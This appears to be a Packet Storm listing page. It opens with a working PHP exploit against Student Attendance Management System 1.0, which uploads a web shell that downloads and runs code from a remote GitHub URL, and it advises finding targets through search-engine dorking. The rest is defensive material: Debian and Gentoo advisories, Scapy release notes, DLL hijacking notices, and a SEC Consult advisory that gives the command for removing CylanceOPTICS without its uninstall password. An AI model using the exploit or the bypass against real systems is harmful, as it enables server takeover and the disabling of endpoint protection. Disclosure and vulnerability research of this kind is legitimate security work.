Student Attendance Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Student Attendance Management System 1.0 code injection Vulnerability                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 28    Line 37  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',    'contact' => '00213771818860',    'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/student_attendance/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/student_attendance/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Student Attendance Management System 1.0 Code Injection

Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. It is intended to do the same things as ttlscan, nmap, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, firewalk, irpas, tethereal, tcpdump, etc.

Scapy Packet Manipulation Tool 2.6.0

Debian Linux Security Advisory 5779-1 - Simone Margaritelli reported that cups, the Common UNIX Printing System, does not properly sanitize IPP attributes when creating PPD files, which may result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5779-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 29, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cupsCVE ID         : CVE-2024-47175Simone Margaritelli reported that cups, the Common UNIX Printing System,does not properly sanitize IPP attributes when creating PPD files, whichmay result in the execution of arbitrary code.For the stable distribution (bookworm), this problem has been fixed inversion 2.4.2-3+deb12u8.We recommend that you upgrade your cups packages.For the detailed security status of cups please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/cupsFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmb5cQJfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0QspA//fRq1YZHhn9UlhgfupxmpK3MHf7XjBl3cttiSkw7mZA+y1CGgUEr4Jxvd8PjkIpsN2xUuKt1Y1iLw79jOU7Vn2VOfJlUSp8ub2aT/wPHt5WnKv4/77xqS/aa+mTa2wHQWWeDssfeF67Z1rYnPk9s6cYvXhKLyAuLTLLOWq+6NWQ6ZmuXqBzmxD7rrOxBBU9rNZsp07AE6jvYmrpvDMYT0Lsy3GvBP/M6BAUF8iMJA38K3J6sR73Zh80TMDOAa8Yp/Svk12kxbjuzWxgPr2sQ/Mb/lpTH+xxxPRVIm9WWUFumPn7j+FqAfIDOieX6/nSMd1kWbSuZyKzLXz2gpVMpU8ge3ypsT9Fa3CdZbXqW6DtrOuCRyQxBKVj0qOhv/qZDIv2eYtGj2wVEphtMWGe8TfW0pFaJPK/WTNdH3xcqyo/OScv0OucW02RjEEGEjD/ErUkRorPkDmTlRIQ4W2e6lcyBYrOkFu2JGHPtnugvohQ3Xc/eEDvdABQp5xZI20F0jl+qljMFFK36qI75eIPQnPEqVfvAG9xmoBgHS4hqIYLi4p14ZaYOci8yW2FHlof2t3TgjH6TJFdH8sp3dGOHCTnKfB+3mq97oipjm6Xoqb8mW2Z0RygvUIS94NFGaFzFKzAlkIssL3Y2VoC9kfrrCe2zhMJ6zRrO5JuXdWapA51E==6Gtg-----END PGP SIGNATURE-----

Debian Security Advisory 5779-1

Debian Linux Security Advisory 5778-1 - Simone Margaritelli reported several vulnerabilities in cups-filters. Missing validation of IPP attributes returned from an IPP server and multiple bugs in the cups-browsed component can result in the execution of arbitrary commands without authentication when a print job is started.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5778-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
September 29, 2024                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : cups-filters  
CVE ID         : CVE-2024-47076 CVE-2024-47176  
Debian Bug     : 1082820 1082827

Simone Margaritelli reported several vulnerabilities in cups-filters.  
Missing validation of IPP attributes returned from an IPP server and  
multiple bugs in the cups-browsed component can result in the execution  
of arbitrary commands without authentication when a print job is  
started.

For the stable distribution (bookworm), these problems have been fixed in  
version 1.28.17-3+deb12u1.

We recommend that you upgrade your cups-filters packages.

For the detailed security status of cups-filters please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/cups-filters

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmb5b6BfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RqGA//VfGe41guaMVg8lIgwu9s3atSUeoUDZRf83XWQ0S6gvpTCG/Bko1KSgj0  
xmzHlmjwFA2Sly5PhiWcqDp59txdXZymdojTXFebuE5MFqxcSLoIpn/vxZT6f3ky  
BdfK4oTXfJ5Au+KgRF+jC9zGiKgkMJfaCaf2PPFwan/4nXLYw/GIkvnYAecjGgEQ  
KjuzUgkItBVaGVeaInMISwfSISQFrMK80P7MJyX8ET2b71ijjpReAbfsuOQRaizj  
5dnBXxCAE8l8A5VsZFUT1EK4m3Z7BgKKImnLqDdk61Mz+T7eC4R+Kv+rb5lLBMYK  
pPuBmYlH80U7bK4/TaivuWrX6FdHvtKGFUmQd+YO6rWofwrCTn/8+SlO8ZWOrjKx  
r7UDU7+XTnCu4DI87+7PBcqHEyQTG3CrK/RKblsfw0PP0DFtwJMiipuSjzBmNRZx  
nZppuug7Ks5dljAYGWFrBx2I29Qtj6MD4HeI4JKWoB3r3Xi1gX5vvsav4/r++s9Z  
GvINaqBBIytLjATxLYElCxA74MEmVFNPxUEeEq8xFyPGdnYquJ6xZ6wsy6x+O6Z2  
T4ikIV5+FUA4v/c9JFdMj04dJXXaIfTcxBvYA4CoykdHmMGAw1/rCuucL4zoPMUl  
G03rz0k3/QziqZ6EM/Firbd++RrCo86wBiA10Anmhy7+0kS3TCE=  
=fH4o  
-----END PGP SIGNATURE-----

Debian Security Advisory 5778-1

VegaBird Vooki version 5.2.9 suffers from a dll hijacking vulnerability.

    ====================================CVE ID: CVE-2024-45874Author: Iulian FloreaVendor: VegaBirdProduct:  Vooki - Dynamic Web Application & REST API Vulnerability Scanner (DAST Tool)Vulnerability Type: DLL Hijacking========================================================================Summary==================================== A DLL hijacking vulnerability in VegaBird Vooki 5.2.9 allows attackers to execute arbitrary code / maintain persistence via placing a crafted DLL file in the same directory as Yaazhini.exe.====================================Exploitation====================================By placing an arbitrary DLL (Example: dcomp.dll) within the application folder (C:\Program Files\Vooki) and opening the application (Vooki.exe) it can be noted that the DLL is being loaded. This can lead to persistence or in some cases to privilege escalation.

VegaBird Vooki 5.2.9 DLL Hijacking

VegaBird Yaazhini version 2.0.2 suffers from a dll hijacking vulnerability.

    ====================================CVE ID: CVE-2024-45873Author: Iulian FloreaVendor: VegaBirdProduct:  Vooki - Free Android APK & API Vulnerability Scanner(Yaazhini)Vulnerability Type: DLL Hijacking========================================================================Summary==================================== A DLL hijacking vulnerability in VegaBird Yaazhini 2.0.2 allows attackers to execute arbitrary code / maintain persistence via placing a crafted DLL file in the same directory as Yaazhini.exe.====================================Exploitation====================================By placing an arbitrary DLL (Example: dcomp.dll) within the application folder (C:\Users\<USER>\AppData\Local\Programs\Yaazhini) and opening the application (Yaazhini.exe) it can be noted that the DLL is being loaded. This can lead to persistence or in some cases to privilege escalation.

VegaBird Yaazhini 2.0.2 DLL Hijacking

Gentoo Linux Security Advisory 202409-32 - Multiple vulnerabilities have been discovered in nginx, the worst of which could result in denial of service. Versions greater than or equal to 1.26.2-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-32  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: nginx: Multiple Vulnerabilities  
     Date: September 28, 2024  
     Bugs: #924619, #937938  
       ID: 202409-32

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in nginx, the worst of  
which could result in denial of service.

Background  
==========

nginx is a robust, small, and high performance HTTP and reverse proxy  
server.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
www-servers/nginx  < 1.26.2-r2   >= 1.26.2-r2

Description  
===========

Multiple vulnerabilities have been discovered in nginx. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All nginx users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-servers/nginx-1.26.2-r2"

References  
==========

[ 1 ] CVE-2024-7347  
      https://nvd.nist.gov/vuln/detail/CVE-2024-7347  
[ 2 ] CVE-2024-24989  
      https://nvd.nist.gov/vuln/detail/CVE-2024-24989  
[ 3 ] CVE-2024-24990  
      https://nvd.nist.gov/vuln/detail/CVE-2024-24990

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-32

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-32

Gentoo Linux Security Advisory 202409-31 - Multiple vulnerabilities have been found in Apache HTTPD, the worst of which could result in denial of service. Versions greater than or equal to 2.4.62 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-31  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Apache HTTPD: Multiple Vulnerabilities  
     Date: September 28, 2024  
     Bugs: #928540, #935296, #935427, #936257  
       ID: 202409-31

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Apache HTTPD, the worst of  
which could result in denial of service.

Background  
==========

The Apache HTTP server is one of the most popular web servers on the  
Internet.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
www-servers/apache  < 2.4.62      >= 2.4.62

Description  
===========

Multiple vulnerabilities have been discovered in Apache HTTPD. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Apache HTTPD users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-servers/apache-2.4.62"

References  
==========

[ 1 ] CVE-2023-38709  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38709  
[ 2 ] CVE-2024-24795  
      https://nvd.nist.gov/vuln/detail/CVE-2024-24795  
[ 3 ] CVE-2024-27316  
      https://nvd.nist.gov/vuln/detail/CVE-2024-27316  
[ 4 ] CVE-2024-36387  
      https://nvd.nist.gov/vuln/detail/CVE-2024-36387  
[ 5 ] CVE-2024-38472  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38472  
[ 6 ] CVE-2024-38473  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38473  
[ 7 ] CVE-2024-38474  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38474  
[ 8 ] CVE-2024-38475  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38475  
[ 9 ] CVE-2024-38476  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38476  
[ 10 ] CVE-2024-38477  
      https://nvd.nist.gov/vuln/detail/CVE-2024-38477  
[ 11 ] CVE-2024-39573  
      https://nvd.nist.gov/vuln/detail/CVE-2024-39573  
[ 12 ] CVE-2024-39884  
      https://nvd.nist.gov/vuln/detail/CVE-2024-39884  
[ 13 ] CVE-2024-40725  
      https://nvd.nist.gov/vuln/detail/CVE-2024-40725  
[ 14 ] CVE-2024-40898  
      https://nvd.nist.gov/vuln/detail/CVE-2024-40898

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-31

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-31

BlackBerry CylanceOPTICS versions prior to 3.3 MR2 and 3.2 MR5 suffer from an uninstall password bypass vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20240925-0 >  
=======================================================================  
              title: Uninstall Password Bypass  
            product: BlackBerry CylanceOPTICS Windows Installer Package  
 vulnerable version: CylanceOPTICS <3.3 MR2  
                     CylanceOPTICS <3.2 MR5  
      fixed version: CylanceOPTICS 3.3 MR2  
                     CylanceOPTICS 3.2 MR5  
         CVE number: CVE-2024-35214  
             impact: high  
           homepage: https://www.blackberry.com/us/en/support/cylance  
              found: 2023-12-12  
                 by: Initially by Rene Grubmair (Greiner)  
                     P. Espernberger (Office Leonding)  
                     M. Engleitner (Office Leonding)  
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"CylanceOPTICS is an endpoint detection and response solution that collects  
and analyzes forensic data from devices to identify and resolve threats  
before they impact your organization’s users and data."

Source: https://docs.blackberry.com/en/unified-endpoint-security/blackberry-ues/overview/What-is-BlackBerry-Optics

Business recommendation:  
------------------------  
The vendor provides a patched version which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Uninstall Password Bypass (CVE-2024-35214)  
Due to the quiet (un-)installation feature offered by the CylanceOPTICS  
application, the uninstaller can be called directly without requiring  
a previously set uninstall password.

In order to exploit this vulnerability, an attacker must have local admin  
rights.

Proof of concept:  
-----------------  
1) Uninstall Password Bypass (CVE-2024-35214)  
The path to the MSI uninstaller can be found by searching the  
Windows Registry for "CylanceOPTICS" which results in the following  
node containing uninstall information for the 64bit application:

HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{6e96194b-ca7b-40a4-badd-7eac94ea62c7}

To uninstall CylanceOPTICS without being prompted for a password,  
the QuietUninstallString command is executed as privileged user on  
the system.

"C:\ProgramData\Package Cache\{6e96194b-ca7b-40a4-badd-7eac94ea62c7}\CylanceOPTICSSetup.exe" /uninstall /quiet

Afterwards, the CylanceOPTICS application is successfully removed.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested by SEC Consult which was the most  
recent version available at the time of the test:  
* 3.2.2199.0

According to the vendor, all previous versions are affected:  
* CylanceOPTICS <3.3 MR2  
* CylanceOPTICS <3.2 MR5

Vendor contact timeline:  
------------------------  
2024-02-02: Contacting vendor through secure@blackberry.com, case  
            BIRT2024-00128 was created  
2024-02-02: Auto-response, case is being tracked as # BIRT2024-00128  
2024-02-07: Vendor requests settings of the CylanceConsole device.  
            Vendor is currently attempting to reproduce the vulnerability.  
2024-02-08: The requested settings were provided.  
2024-02-09: Vendor confirms the Uninstall Password Bypass vulnerability.  
            Additional information (log files) are requested.  
            Clarification of the impact of the vulnerability is requested.  
2024-02-15: Explanation has been sent. Log files could not be provided  
            as the device has already been reset.  
2024-02-15: The vulnerability was escalated to the development team.  
2024-02-23: Short update was provided outlining the current plan to  
            fix the vulnerability until summer 2024.  
            Vendor commits to bi-weekly updates on their progress.  
2024-04-19: Expected release date (June 3rd) was communicated and  
            the CVE number was provided.  
2024-05-21: Coordination of the joint release date (2024-06-11) and  
            providing the updated security advisory and new CVE number.  
2024-06-07: Vendor released CylanceOPTICS 3.3 MR1 and CylanceOPTICS 3.2 MR4  
            on 4th June. But requests advisory disclosure to be delayed to  
            10th September because of identified weakness in current solution.  
2024-08-20: Vendor releases new version 3.3 MR2 and 3.2 MR5.  
2024-09-25: Coordinated release of security advisory.

SEC Consult was informed about the progress bi-weekly.  
Only the most relevant information is included in the timeline.

Solution:  
---------  
The vendor provides the following patched versions to their customers:  
* CylanceOPTICS 3.3 MR2  
* CylanceOPTICS 3.2 MR5

In addition to the updated versions, the vendor has released an  
optional script which customers can run to remove the old version and replace  
it with the update. New customers, or customers who uninstall /  
reinstall will not need to run the script, nor will existing customers  
who have not configured an Uninstall password.

The vendor provides the following security notes with further information:  
https://support.blackberry.com/pkb/s/article/140080

Workaround:  
-----------  
As a workaround, it is possible to delete the affected CylanceOPTICSSetup.exe  
binary.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF M. Engleitner, P. Espernberger / @2024

BlackBerry CylanceOPTICS Uninstall Password Bypass

Debian Linux Security Advisory 5777-1 - It was discovered that the Booth cluster ticket manager failed to correctly validate some authentication hashes.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5777-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
September 27, 2024                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : booth  
CVE ID         : CVE-2024-3049

It was discovered that the Booth cluster ticket manager failed to  
correctly validate some authentication hashes.

For the stable distribution (bookworm), this problem has been fixed in  
version 1.0-283-g9d4029a-2+deb12u1.

We recommend that you upgrade your booth packages.

For the detailed security status of booth please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/booth

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmb22HgACgkQEMKTtsN8  
TjZI6Q//QX5bGCCAzOJDo9KTp8iixUenBrznfyctVZ0pFVKAIP3ENACkW0rMH+Sw  
GBIsIJRCQwdBbSYV1Jn3F2i7wvMby2HUhabMsnorM49lC0ptoz6HZ6iKWcIvZwRF  
vDmFPnCEfVVbGZy+6NkQMNDQb0PzbKtGT70L/E3Iss3Dtpknd97tNu4urJTleSG8  
ZkrM3QkXs/4IPluEYTrnoJHXR7sJ5GyqPBRZnLn7Lwx3bPesN7E7Zz5UClyMr6iO  
teExKLY/Vfjh507818eaVHRcoEDSElZjb//93RzyOuGpUNnwCNKLkwsGIlmsFfmC  
0ikzeO9eDe1y6EvpY7/xAWneoxGnX9CKjcwUVD0Kqq7hHnpxP/506Alp38D07tWn  
s+Yz7SeK4RSIDIzwb0gCLmt22eE6t/3cZxR1RE9qk1hWwuV/YdB8WyYqPz410myN  
JO2IFWg9NzGP5zOWtuyytzOZTEHkLvNp5i4ktIU16Y4tLvstgSnNUoSHImr6YXrC  
hOVWmqvqif3UurHCctHfmZVkjMFmFcKPjOFOQ3TNEuDAT3PtUNGs5aSEVMhtMvUp  
oPYLRVxRYKSqP61rwUoyPlaOB39vtraKdMiTvjm8VNUS655lPB/VOZibVhI8+ym4  
/H7mXtJXBN8LsdVx4+Nnr2wc4ZFtVXUGdyChER8+VmfLDtfwkZk=  
=futv  
-----END PGP SIGNATURE-----

Source

Packet Storm